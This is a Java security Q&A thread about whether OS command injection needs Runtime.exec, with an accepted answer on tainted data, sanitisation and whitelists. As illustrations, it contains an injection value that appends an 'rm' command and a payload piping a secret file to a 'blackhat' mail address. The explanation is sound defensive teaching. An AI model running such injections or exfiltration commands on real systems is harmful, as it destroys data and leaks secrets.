# OS command injection possible without Runtime api execution?

Tags: java, security, owasp

As per mine understanding from [site](https://www.owasp.org/index.php/Command_injection_in_Java)  OS(linux/windows) command execution is possible 
only when i am using any string  as parameter in  [Runtime.exec](https://docs.oracle.com/javase/7/docs/api/java/lang/Runtime.html#exec(java.lang.String))

My question is if i do not use any request parameter (coming from user) or in fact any string under Runtime.exec is OS command execution possible ? My answer is it should not be possble
in any way.

Comment: At a first gaze you are right. However the program you execute (even if started with non-user defined parameters) may process user data that may trigger vulnerabilities in the program which may case e.g. a command injection.

Comment: @Robert agreed. But main point is whether its user input or internal input, to execute the OS command injection in java, that input has to be executed through `Runtime.exec(String command)`, there is no other way ?

Answer (score 1, accepted):

The safest thing is always to avoid calls like `system()` or `exec()` -- and indeed in some organisations you absolutely won't pass a security review if your application does so.

However, as you've hinted, you can take steps to make it safe. A useful concept is that of "tainted" data. A piece of data provided by the user or client is *tainted*. A piece of data *built from* tainted data, is also tainted. You can "untaint* data, for example by mapping it to a whitelisted set of options, or by cleaning it.

```
 String name = request.getBody(); // tainted
 String cmd = "grep " + name + " customers.txt"; // also tainted
 String cleanName = sanitize(name); // untainted
 String cleanerName = validNameMap.get(name); // untainted
 String literal = "a literal string"; // untainted
```

You can see how if `request.getBody()` returns `slim` then `grep slim customers.txt` is safe. However if the user supplied data is `slim customers.txt; rm`, the resulting `cmd` of `grep slim customers.txt; rm customers.txt` is bad news.

`sanitize()` might do things like strip out everything but `a-zA-Z`.

There is quite a lot scope for sanitizing routines to be naive, and not thorough enough, and this can be an attack vector -- so whitelists are considered safer.

(There are tools for many languages which can analyse code, and warn you if data derived from an untrusted source is written to an unsafe destination: https://www.owasp.org/index.php/Source_Code_Analysis_Tools )

If the string(s) passed to `exec()` are untainted, that's a step towards safety. However there are still ways for this to be dangerous. Consider:

```
 String command = "/usr/local/bin/myProgram";
 String path = "/tmp/inputfile";
 createNewFile(path, request.getBody());
 runtime.exec(command, path);
```

Now, both `command` and `path` are untainted -- they are not supplied by the user -- but we are passing tained data to `myProgram` via the file, and there's a risk that myProgram will do something dangerous with the data.

The most obvious example of this would be if `command` was `/bin/bash`, and the request body was something like `rm -rf *` or `cat secretFile | mail blackhat@naughtyhacker.com`.

But there are plenty of more subtle ways this could be risky. Perhaps `myprogram` uses the content of the file to build SQL requests, for example.

You can mitigate these risks in various places. You can sanitize the data before writing it to the file, or you can make it clear in your security model that the content of the file is tainted, `myprogram` must treat it as such, and do its own untainting.